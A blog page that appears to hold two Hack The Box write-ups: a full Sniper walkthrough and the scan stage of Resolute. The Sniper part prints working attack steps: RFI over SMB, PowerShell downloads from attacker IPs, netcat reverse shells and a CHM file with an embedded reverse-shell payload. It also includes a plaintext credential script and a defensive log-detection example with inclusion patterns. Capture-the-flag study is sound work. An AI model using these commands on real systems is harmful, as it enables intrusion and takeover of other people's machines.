Month: January 2020
htb-sniper-nl
As always, first an nmap scan:
root@kali:~/htb/sniper# nmap -A 10.10.10.151 -oN fullscan
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-27 05:00 EST
Nmap scan report for sniper.htb (10.10.10.151)
Host is up (0.091s latency).
Not shown: 996 filtered ports
PORT    STATE SERVICE       VERSION
80/tcp  open  http          Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Sniper Co.
135/tcp open  msrpc         Microsoft Windows RPC
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds?
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 8h01m34s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-01-27T18:02:27
|_  start_date: N/A

TRACEROUTE (using port 445/tcp)
HOP RTT      ADDRESS
1   92.15 ms 10.10.14.1
2   94.52 ms sniper.htb (10.10.10.151)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 65.82 seconds
root@kali:~/htb/sniper#
I see that only a few ports are open, including SMB and a web server. After some analysis of the SMB server I find nothing of immediate importance, so I keep browsing the web pages. At some point in the blog I see a page that accepts a parameter, so I start playing with it. Because it may be vulnerable to injection, I start with local and remote file inclusion. After some ups and downs I find that neither local nor remote file inclusion works via HTTP, so I keep looking to see if anything else is possible. While investigating this in Burp, I come across this link about RFI over SMB.
GET /blog/?lang=\WINDOWS\system32\drivers\etc\hosts HTTP/1.1
Host: 10.10.10.151
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
So I reconfigure my SMB server to have a share called "sniper" and see if I can replicate what is in the examples. See also: https://www.puckiestyle.nl/create-a-public-samba-share/
On Kali, first run: systemctl start smbd
After some trial and error I see my nickname popping up in the source code, indicating that the RFI over SMB has worked. So now it is time to get this webshell and call it through my SMB server.
The db.php file contains a username and password, which may come in handy. I note them for later use and decide it is time to try a decent shell.
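From the defender's side, the signal in requests like the one above is a lang value that is a Windows path, a UNC share or a URL instead of a language code. The following Python is an added example (not code from this post or from the Sniper box) that flags such values in IIS W3C logs; the log lines, the lang parameter name and the client addresses are constructed for the demonstration, only the W3C field layout is the IIS default.

```python
"""Flag local/remote file-inclusion attempts against a query parameter in IIS W3C logs.

Added example, not code from the original post. The log lines are constructed to
mimic the /blog/?lang= requests discussed above; only the field layout is the
real IIS W3C default.
"""
import re
from urllib.parse import parse_qs

# Constructed IIS log. In W3C format spaces inside a field are written as '+',
# so a plain split on spaces is safe for the default field set.
SAMPLE_LOG = r"""#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port c-ip cs(User-Agent) sc-status
2020-01-27 10:02:27 10.10.10.151 GET /blog/ lang=en 80 10.10.14.11 Mozilla/5.0 200
2020-01-27 10:02:31 10.10.10.151 GET /blog/ lang=\WINDOWS\system32\drivers\etc\hosts 80 10.10.14.11 Mozilla/5.0 200
2020-01-27 10:02:40 10.10.10.151 GET /blog/ lang=\\10.10.14.11\sniper\shell.php 80 10.10.14.11 Mozilla/5.0 200
2020-01-27 10:02:45 10.10.10.151 GET /blog/ lang=http://10.10.14.11/shell.php 80 10.10.14.11 Mozilla/5.0 200
2020-01-27 10:02:50 10.10.10.151 GET /blog/ lang=..%2F..%2Fdb.php 80 10.10.14.11 Mozilla/5.0 200
2020-01-27 10:03:00 10.10.10.151 GET /index.php - 80 10.10.14.12 Mozilla/5.0 200
"""

# Checked in order; the first match wins, so the UNC test must precede the
# plain absolute-path test (both start with a backslash).
INCLUSION_PATTERNS = {
    "unc-path":      re.compile(r"^\\\\[^\\]+\\"),                # \\host\share\... : RFI over SMB
    "remote-url":    re.compile(r"^[a-z][a-z0-9+.\-]*://", re.I),  # http://host/...  : classic RFI
    "absolute-path": re.compile(r"^(?:[a-z]:)?\\", re.I),         # \Windows\... or C:\... : LFI
    "traversal":     re.compile(r"(?:^|[\\/])\.\.(?:[\\/]|$)"),   # ../ or ..\ anywhere : LFI
}


def classify_value(value):
    """Return the name of the first inclusion pattern matching a decoded value, or None."""
    for name, pattern in INCLUSION_PATTERNS.items():
        if pattern.search(value):
            return name
    return None


def parse_w3c(text):
    """Yield one dict per log entry, keyed by the most recent #Fields directive."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        parts = line.split(" ")
        if len(parts) != len(fields):
            continue  # malformed line: skip rather than guess column positions
        yield dict(zip(fields, parts))


def find_inclusion_attempts(text, watched_params=("lang",)):
    """Return (time, client ip, param, decoded value, pattern) for each suspicious request."""
    hits = []
    for entry in parse_w3c(text):
        query = entry.get("cs-uri-query", "-")
        if query == "-":
            continue
        # parse_qs percent-decodes, so ..%2F..%2F is inspected as ../../
        params = parse_qs(query, keep_blank_values=True)
        for name in watched_params:
            for value in params.get(name, []):
                kind = classify_value(value)
                if kind:
                    hits.append((entry["time"], entry["c-ip"], name, value, kind))
    return hits


if __name__ == "__main__":
    for hit in find_inclusion_attempts(SAMPLE_LOG):
        print("%s %s %s=%r -> %s" % hit)
```

On the constructed log this reports four of the six requests; the benign lang=en and the request without a query string pass untouched.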
powershell Invoke-Webrequest "http://10.10.10.78/nc.exe" -OutFile c:\puckiestyle\nc.exe
So first I use PowerShell to transfer netcat, or, even simpler, upload wwwwolfshell.
nc.exe 10.10.14.11 9001 -e cmd
Then I call nc.exe and get a shell on Sniper:
root@kali:~/htb# rlwrap nc -nlvp 9001
listening on [any] 9001 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.151] 49684
Microsoft Windows [Version 10.0.17763.678]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\puckiestyle>whoami
whoami
nt authority\iusr

C:\puckiestyle>
So I got the shell as IUSR. There is only one other regular user on the box, named Chris. Maybe the database password is the same as the user's password, so I want to try using PowerShell to escalate my rights. After some searching on how to use the password with a PowerShell command, I came across a script and adjusted it to my needs.
root@kalivm:~/Sniper# cat getshell.ps1
$username = 'SNIPER\Chris'
$password = '36mEAhz/B8xQ~2VM'
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential -ArgumentList $username,$securePassword
New-PSSession -Credential $credential | Enter-PSSession
Again I use PowerShell to transfer the file, and then execute it:
powershell Invoke-WebRequest "http://10.10.14.11/getshell.ps1" -OutFile c:\puckiestyle\getshell.ps1
c:\puckiestyle>powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\sedje> Invoke-WebRequest "http://10.10.12.78/getshell.ps1" -OutFile c:\sedje\getshell.ps1
Invoke-WebRequest "http://10.10.12.78/getshell.ps1" -OutFile c:\sedje\getshell.ps1
PS C:\sedje> ./getshell.ps1
./getshell.ps1
[localhost]: PS C:\Users\Chris\Documents> whoami
whoami
sniper\chris
[localhost]: PS C:\Users\Chris\Documents>dir c:\
dir c:\
[localhost]: PS C:\Users\Chris\Documents>
c:\>cmd /c icacls puckiestyle /c /t /grant everyone:F
cmd /c icacls puckiestyle /c /t /grant everyone:F
processed file: puckiestyle
processed file: puckiestyle\getshell.ps1
processed file: puckiestyle\Microsoft
processed file: puckiestyle\nc.exe
processed file: puckiestyle\Microsoft\Windows
processed file: puckiestyle\Microsoft\Windows\PowerShell
processed file: puckiestyle\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Successfully processed 7 files; Failed processing 0 files

c:\puckiestyle>powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\puckiestyle>
[localhost]: PS C:\Users\Chris\Documents> C:\puckiestyle\nc.exe 10.10.14.11 9002 -e powershell
C:\puckiestyle\nc.exe 10.10.14.11 9002 -e powershell
root@kali:/opt/evil-winrm# rlwrap nc -nlvp 9002
listening on [any] 9002 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.151] 49711
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Users\Chris\Documents> type ../Desktop/user.txt
type ../Desktop/user.txt
21f4d0f29fc4dd867500c1ad716cf56e
PS C:\Users\Chris\Documents>
Now I have a fully functional shell.
It is also possible with WinRM.
First upload and run plink.exe:
C:\temp>.\plink.exe -R 5985:127.0.0.1:5985 10.10.14.8
.\plink.exe -R 5985:127.0.0.1:5985 10.10.14.8
The server's host key is not cached in the registry. You
have no guarantee that the server is the computer you
think it is.
The server's rsa2 key fingerprint is:
ssh-rsa 2048 85:9c:65:7b:ec:db:65:ee:28:91:c7:2e:2f:e0:22:06
If you trust this host, enter "y" to add the key to
PuTTY's cache and carry on connecting.
If you want to carry on connecting just once, without
adding the key to the cache, enter "n".
If you do not trust this host, press Return to abandon the
connection.
Store key in cache? (y/n) y
login as: puck
puck@10.10.14.8's password: secretpassword

Linux kali 4.19.0-kali1-amd64 #1 SMP Debian 4.19.13-1kali1 (2019-01-03) x86_64

The programs included with the Kali GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Jan 27 03:34:27 2020 from 10.10.10.151
Could not chdir to home directory /home/puck: No such file or directory
$
and next
PrivEsc
I found this:
PS C:\Users\Chris> dir Downloads
dir Downloads
Directory: C:\Users\Chris\Downloads
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 4/11/2019 8:36 AM 10462 instructions.chm
A compiled HTML help file, so this can be interesting. With netcat I transferred this file to my Windows box, and this was the content
After more enumeration on disk I found:
PS C:\Docs> type note.txt
Hi Chris,
Your php skillz suck. Contact yamitenshi so that he teaches you how to use it and after that fix the website as there are a lot of bugs on it. And I hope that you've prepared the documentation for our new app. Drop it here when you're done with it.
Regards,
Sniper CEO.
So apparently instructions.chm is the documentation Chris should prepare for the CEO and then drop in this folder. I first installed htmlexe.exe from https://www.microsoft.com/en-us/download/details.aspx?id=21138 and then used Nishang: https://raw.githubusercontent.com/samratashok/nishang/master/Client/Out-CHM.ps1
C:\temp>Powershell -Version 2
PS C:\temp> Import-Module .\Out-CHM.ps1
PS C:\temp> out-chm -Payload "c:\temp\nc 10.10.14.8 5353 -e cmd" -HHCPath "C:\Program Files (x86)\HTML Help Workshop"
Microsoft HTML Help Compiler 4.74.8702

Compiling c:\temp\doc.chm

Compile time: 0 minutes, 0 seconds
2       Topics
4       Local links
4       Internet links
0       Graphics

Created c:\temp\doc.chm, 13,428 bytes
Compression increased file by 271 bytes.
PS C:\temp> copy .\doc.chm c:\python37\project.chm
root@kali:~/htb/sniper# python3 -m http.server 82
Serving HTTP on 0.0.0.0 port 82 (http://0.0.0.0:82/) ...
10.10.10.151 - - [27/Jan/2020 03:58:26] "GET /project.chm HTTP/1.1" 200 -
PS C:\Docs> Invoke-WebRequest "http://10.10.14.8:82/project.chm" -Outfile c:\Docs\project.chm
Invoke-WebRequest "http://10.10.14.8:82/project.chm" -Outfile c:\Docs\project.chm
From the Sniper host I do an Invoke-WebRequest again to download the CHM file to the desired folder, while a netcat listener waits for the shell:
root@kali:~/Sniper# nc -nlvp 9005
Listening on 0.0.0.0 9005
Connection received on 10.10.10.151 53736
Microsoft Windows [Version 10.0.17763.678]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
sniper\administrator
C:\Windows\system32>cd C:\Users\Administrator\Desktop
cd C:\Users\Administrator\Desktop
C:\Users\Administrator\Desktop>type root.txt
type root.txt
5624caf363e2750e994f6be0b7436c15
Author : Puckiestyle
htb-resolute-nl
Like with all Windows-based machines, I added the IP 10.10.10.169 to my /etc/hosts as resolute.htb and ran a port scan with nmap.
NMAP SCAN RESULTS
E:\PENTEST>nmap -T4 -A -v 10.10.10.169
Starting Nmap 7.70 ( https://nmap.org ) at 2020-07-10 09:15 W. Europe Summer Time
NSE: Loaded 148 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 09:15
Completed NSE at 09:15, 0.00s elapsed
Initiating NSE at 09:15
Completed NSE at 09:15, 0.00s elapsed
Initiating Ping Scan at 09:15
Scanning 10.10.10.169 [4 ports]
Completed Ping Scan at 09:15, 2.59s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 09:16
Completed Parallel DNS resolution of 1 host. at 09:16, 0.00s elapsed
Initiating SYN Stealth Scan at 09:16
Scanning 10.10.10.169 [1000 ports]
Discovered open port 445/tcp on 10.10.10.169
Discovered open port 135/tcp on 10.10.10.169
Discovered open port 139/tcp on 10.10.10.169
Discovered open port 88/tcp on 10.10.10.169
Discovered open port 636/tcp on 10.10.10.169
Discovered open port 593/tcp on 10.10.10.169
Discovered open port 389/tcp on 10.10.10.169
Discovered open port 464/tcp on 10.10.10.169
Completed SYN Stealth Scan at 09:16, 1.31s elapsed (1000 total ports)
Initiating Service scan at 09:16
Scanning 8 services on 10.10.10.169
Completed Service scan at 09:16, 17.39s elapsed (8 services on 1 host)
Initiating OS detection (try #1) against 10.10.10.169
Retrying OS detection (try #2) against 10.10.10.169
Retrying OS detection (try #3) against 10.10.10.169
Retrying OS detection (try #4) against 10.10.10.169
Retrying OS detection (try #5) against 10.10.10.169
Initiating Traceroute at 09:16
Completed Traceroute at 09:16, 0.15s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 09:16
Completed Parallel DNS resolution of 2 hosts. at 09:16, 6.51s elapsed
NSE: Script scanning 10.10.10.169.
Initiating NSE at 09:16
Completed NSE at 09:17, 26.25s elapsed
Initiating NSE at 09:17
Completed NSE at 09:17, 0.21s elapsed
Nmap scan report for 10.10.10.169
Host is up (0.18s latency).
Not shown: 992 closed ports
PORT    STATE SERVICE      VERSION
88/tcp  open  kerberos-sec Microsoft Windows Kerberos (server time: 2020-07-10 07:29:38Z)
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)
464/tcp open  kpasswd5?
593/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp open  tcpwrapped
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.70%E=4%D=7/10%OT=88%CT=1%CU=37112%PV=Y%DS=2%DC=T%G=Y%TM=5F0815F
OS:B%P=i686-pc-windows-windows)SEQ(SP=100%GCD=1%ISR=102%TI=I%CI=I%II=I%SS=S
OS:%TS=9)SEQ(SP=100%GCD=1%ISR=102%TI=RD%CI=RD%II=I%TS=A)OPS(O1=M54DNW8ST11%
OS:O2=M54DNW8ST11%O3=M54DNW8NNT11%O4=M54DNW8ST11%O5=M54DNW8ST11%O6=M54DST11
OS:)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=2000)ECN(R=Y%DF=Y%T=80%W
OS:=2000%O=M54DNW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y
OS:%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR
OS:%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80
OS:%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q
OS:=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=164
OS:%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)

Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=256 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: RESOLUTE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h33m20s, deviation: 4h02m31s, median: 13m19s
| smb-os-discovery:
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Resolute
|   NetBIOS computer name: RESOLUTE\x00
|   Domain name: megabank.local
|   Forest name: megabank.local
|   FQDN: Resolute.megabank.local
|_  System time: 2020-07-10T00:30:12-07:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2020-07-10 09:30:10
|_  start_date: 2020-07-10 09:29:14

TRACEROUTE (using port 1720/tcp)
HOP RTT       ADDRESS
1   85.00 ms  10.10.14.1
2   144.00 ms 10.10.10.169

NSE: Script Post-scanning.
Initiating NSE at 09:17
Completed NSE at 09:17, 0.00s elapsed
Initiating NSE at 09:17
Completed NSE at 09:17, 0.00s elapsed
Read data files from: C:\Program Files (x86)\Nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 82.49 seconds
           Raw packets sent: 1108 (52.474KB) | Rcvd: 1122 (48.618KB)

E:\PENTEST>
Next I used enum4linux:
kali@kali:~/htb/resolute$ enum4linux 10.10.10.169
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Fri Jul 10 03:23:18 2020

 ==========================
|    Target Information    |
 ==========================
Target ........... 10.10.10.169
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

 ====================================================
|    Enumerating Workgroup/Domain on 10.10.10.169    |
 ====================================================
[E] Can't find workgroup/domain

 ============================================
|    Nbtstat Information for 10.10.10.169    |
 ============================================
Looking up status of 10.10.10.169
No reply from 10.10.10.169

 =====================================
|    Session Check on 10.10.10.169    |
 =====================================
[+] Server 10.10.10.169 allows sessions using username '', password ''
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 451.
[+] Got domain/workgroup name:

 ===========================================
|    Getting domain SID for 10.10.10.169    |
 ===========================================
Domain Name: MEGABANK
Domain Sid: S-1-5-21-1392959593-3013219662-3596683436
[+] Host is part of a domain (not a workgroup)

 ======================================
|    OS information on 10.10.10.169    |
 ======================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 458.
[+] Got OS info for 10.10.10.169 from smbclient:
[+] Got OS info for 10.10.10.169 from srvinfo:
Unable to initialize messaging context
Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED

 =============================
|    Users on 10.10.10.169    |
 =============================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 866.
index: 0x10b0 RID: 0x19ca acb: 0x00000010 Account: abigail	Name: (null)	Desc: (null)
index: 0xfbc RID: 0x1f4 acb: 0x00000210 Account: Administrator	Name: (null)	Desc: Built-in account for administering the computer/domain
index: 0x10b4 RID: 0x19ce acb: 0x00000010 Account: angela	Name: (null)	Desc: (null)
index: 0x10bc RID: 0x19d6 acb: 0x00000010 Account: annette	Name: (null)	Desc: (null)
index: 0x10bd RID: 0x19d7 acb: 0x00000010 Account: annika	Name: (null)	Desc: (null)
index: 0x10b9 RID: 0x19d3 acb: 0x00000010 Account: claire	Name: (null)	Desc: (null)
index: 0x10bf RID: 0x19d9 acb: 0x00000010 Account: claude	Name: (null)	Desc: (null)
index: 0xfbe RID: 0x1f7 acb: 0x00000215 Account: DefaultAccount	Name: (null)	Desc: A user account managed by the system.
index: 0x10b5 RID: 0x19cf acb: 0x00000010 Account: felicia	Name: (null)	Desc: (null)
index: 0x10b3 RID: 0x19cd acb: 0x00000010 Account: fred	Name: (null)	Desc: (null)
index: 0xfbd RID: 0x1f5 acb: 0x00000215 Account: Guest	Name: (null)	Desc: Built-in account for guest access to the computer/domain
index: 0x10b6 RID: 0x19d0 acb: 0x00000010 Account: gustavo	Name: (null)	Desc: (null)
index: 0xff4 RID: 0x1f6 acb: 0x00000011 Account: krbtgt	Name: (null)	Desc: Key Distribution Center Service Account
index: 0x10b1 RID: 0x19cb acb: 0x00000010 Account: marcus	Name: (null)	Desc: (null)
index: 0x10a9 RID: 0x457 acb: 0x00000210 Account: marko	Name: Marko Novak	Desc: Account created. Password set to Welcome123!
index: 0x10c0 RID: 0x2775 acb: 0x00000010 Account: melanie	Name: (null)	Desc: (null)
index: 0x10c3 RID: 0x2778 acb: 0x00000010 Account: naoki	Name: (null)	Desc: (null)
index: 0x10ba RID: 0x19d4 acb: 0x00000010 Account: paulo	Name: (null)	Desc: (null)
index: 0x10be RID: 0x19d8 acb: 0x00000010 Account: per	Name: (null)	Desc: (null)
index: 0x10a3 RID: 0x451 acb: 0x00000210 Account: ryan	Name: Ryan Bertrand	Desc: (null)
index: 0x10b2 RID: 0x19cc acb: 0x00000010 Account: sally	Name: (null)	Desc: (null)
index: 0x10c2 RID: 0x2777 acb: 0x00000010 Account: simon	Name: (null)	Desc: (null)
index: 0x10bb RID: 0x19d5 acb: 0x00000010 Account: steve	Name: (null)	Desc: (null)
index: 0x10b8 RID: 0x19d2 acb: 0x00000010 Account: stevie	Name: (null)	Desc: (null)
index: 0x10af RID: 0x19c9 acb: 0x00000010 Account: sunita	Name: (null)	Desc: (null)
index: 0x10b7 RID: 0x19d1 acb: 0x00000010 Account: ulf	Name: (null)	Desc: (null)
index: 0x10c1 RID: 0x2776 acb: 0x00000010 Account: zach	Name: (null)	Desc: (null)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 881.
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[ryan] rid:[0x451]
user:[marko] rid:[0x457]
user:[sunita] rid:[0x19c9]
user:[abigail] rid:[0x19ca]
user:[marcus] rid:[0x19cb]
user:[sally] rid:[0x19cc]
user:[fred] rid:[0x19cd]
user:[angela] rid:[0x19ce]
user:[felicia] rid:[0x19cf]
user:[gustavo] rid:[0x19d0]
user:[ulf] rid:[0x19d1]
user:[stevie] rid:[0x19d2]
user:[claire] rid:[0x19d3]
user:[paulo] rid:[0x19d4]
user:[steve] rid:[0x19d5]
user:[annette] rid:[0x19d6]
user:[annika] rid:[0x19d7]
user:[per] rid:[0x19d8]
user:[claude] rid:[0x19d9]
user:[melanie] rid:[0x2775]
user:[zach] rid:[0x2776]
user:[simon] rid:[0x2777]
user:[naoki] rid:[0x2778]

 =========================================
|    Share Enumeration on 10.10.10.169    |
 =========================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 640.
directory_create_or_exist: mkdir failed on directory /run/samba/msg.lock: Permission denied
Unable to initialize messaging context

	Sharename       Type      Comment
	---------       ----      -------
SMB1 disabled -- no workgroup available

[+] Attempting to map shares on 10.10.10.169

 ====================================================
|    Password Policy Information for 10.10.10.169    |
 ====================================================
[+] Attaching to 10.10.10.169 using a NULL share
[+] Trying protocol 139/SMB...
[!] Protocol failed: Cannot request session (Called Name:10.10.10.169)
[+] Trying protocol 445/SMB...
[+] Found domain(s):
	[+] MEGABANK
	[+] Builtin
[+] Password Info for Domain: MEGABANK
	[+] Minimum password length: 7
	[+] Password history length: 24
	[+] Maximum password age: Not Set
	[+] Password Complexity Flags: 000000
		[+] Domain Refuse Password Change: 0
		[+] Domain Password Store Cleartext: 0
		[+] Domain Password Lockout Admins: 0
		[+] Domain Password No Clear Change: 0
		[+] Domain Password No Anon Change: 0
		[+] Domain Password Complex: 0
	[+] Minimum password age: 1 day 4 minutes
	[+] Reset Account Lockout Counter: 30 minutes
	[+] Locked Account Duration: 30 minutes
	[+] Account Lockout Threshold: None
	[+] Forced Log off Time: Not Set
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 501.
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 7

 ==============================
|    Groups on 10.10.10.169    |
 ==============================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 542.
[+] Getting builtin groups:
group:[Account Operators] rid:[0x224]
group:[Pre-Windows 2000 Compatible Access] rid:[0x22a]
group:[Incoming Forest Trust Builders] rid:[0x22d]
group:[Windows Authorization Access Group] rid:[0x230]
group:[Terminal Server License Servers] rid:[0x231]
group:[Administrators] rid:[0x220]
group:[Users] rid:[0x221]
group:[Guests] rid:[0x222]
group:[Print Operators] rid:[0x226]
group:[Backup Operators] rid:[0x227]
group:[Replicator] rid:[0x228]
group:[Remote Desktop Users] rid:[0x22b]
group:[Network Configuration Operators] rid:[0x22c]
group:[Performance Monitor Users] rid:[0x22e]
group:[Performance Log Users] rid:[0x22f]
group:[Distributed COM Users] rid:[0x232]
group:[IIS_IUSRS] rid:[0x238]
group:[Cryptographic Operators] rid:[0x239]
group:[Event Log Readers] rid:[0x23d]
group:[Certificate Service DCOM Access] rid:[0x23e]
group:[RDS Remote Access Servers] rid:[0x23f]
group:[RDS Endpoint Servers] rid:[0x240]
group:[RDS Management Servers] rid:[0x241]
group:[Hyper-V Administrators] rid:[0x242]
group:[Access Control Assistance Operators] rid:[0x243]
group:[Remote Management Users] rid:[0x244]
group:[System Managed Accounts Group] rid:[0x245]
group:[Storage Replica Administrators] rid:[0x246]
group:[Server Operators] rid:[0x225]
[+] Getting builtin group memberships:
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574.
[+] Getting local groups:
group:[Cert Publishers] rid:[0x205]
group:[RAS and IAS Servers] rid:[0x229]
group:[Allowed RODC Password Replication Group] rid:[0x23b]
group:[Denied RODC Password Replication Group] rid:[0x23c]
group:[DnsAdmins] rid:[0x44d]
[+] Getting local group memberships:
Group 'Denied RODC Password Replication Group' (RID: 572) has member: Couldn't lookup SIDs
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 593.
[+] Getting domain groups:
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-only Domain Controllers] rid:[0x209]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[Key Admins] rid:[0x20e]
group:[Enterprise Key Admins] rid:[0x20f]
group:[DnsUpdateProxy] rid:[0x44e]
group:[Contractors] rid:[0x44f]
[+] Getting domain group memberships:
Group 'Contractors' (RID: 1103) has member: MEGABANK\ryan
Group 'Domain Users' (RID: 513) has member: MEGABANK\Administrator
Group 'Domain Users' (RID: 513) has member: MEGABANK\DefaultAccount
Group 'Domain Users' (RID: 513) has member: MEGABANK\krbtgt
Group 'Domain Users' (RID: 513) has member: MEGABANK\ryan
Group 'Domain Users' (RID: 513) has member: MEGABANK\marko
Group 'Domain Users' (RID: 513) has member: MEGABANK\sunita
Group 'Domain Users' (RID: 513) has member: MEGABANK\abigail
Group 'Domain Users' (RID: 513) has member: MEGABANK\marcus
Group 'Domain Users' (RID: 513) has member: MEGABANK\sally
Group 'Domain Users' (RID: 513) has member: MEGABANK\fred
Group 'Domain Users' (RID: 513) has member: MEGABANK\angela
Group 'Domain Users' (RID: 513) has member: MEGABANK\felicia
Group 'Domain Users' (RID: 513) has member: MEGABANK\gustavo
Group 'Domain Users' (RID: 513) has member: MEGABANK\ulf
Group 'Domain Users' (RID: 513) has member: MEGABANK\stevie
Group 'Domain Users' (RID: 513) has member: MEGABANK\claire
Group 'Domain Users' (RID: 513) has member: MEGABANK\paulo
Group 'Domain Users' (RID: 513) has member: MEGABANK\steve
Group 'Domain Users' (RID: 513) has member: MEGABANK\annette
Group 'Domain Users' (RID: 513) has member: MEGABANK\annika
Group 'Domain Users' (RID: 513) has member: MEGABANK\per
Group 'Domain Users' (RID: 513) has member: MEGABANK\claude
Group 'Domain Users' (RID: 513) has member: MEGABANK\melanie
Group 'Domain Users' (RID: 513) has member: MEGABANK\zach
Group 'Domain Users' (RID: 513) has member: MEGABANK\simon
Group 'Domain Users' (RID: 513) has member: MEGABANK\naoki
Group 'Domain Computers' (RID: 515) has member: MEGABANK\MS02$
Group 'Enterprise Admins' (RID: 519) has member: MEGABANK\Administrator
Group 'Domain Admins' (RID: 512) has member: MEGABANK\Administrator
Group 'Group Policy Creator Owners' (RID: 520) has member: MEGABANK\Administrator
Group 'Schema Admins' (RID: 518) has member: MEGABANK\Administrator
Group 'Domain Controllers' (RID: 516) has member: MEGABANK\RESOLUTE$

 =======================================================================
|    Users on 10.10.10.169 via RID cycling (RIDS: 500-550,1000-1050)    |
 =======================================================================
[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED. RID cycling not possible.

 =============================================
|    Getting printer info for 10.10.10.169    |
 =============================================
Unable to initialize messaging context
